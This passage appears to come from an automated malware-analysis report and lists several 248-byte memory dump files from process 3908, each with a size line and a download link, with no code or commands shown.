                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-134-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-133-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-114-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-145-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-124-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-128-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-127-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-126-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download

                                                                                                                      • memory/3908-125-0x0000020FAA2E0000-0x0000020FAA2E00F8-memory.dmp

                                                                                                                        Filesize

                                                                                                                        248B

                                                                                                                        Download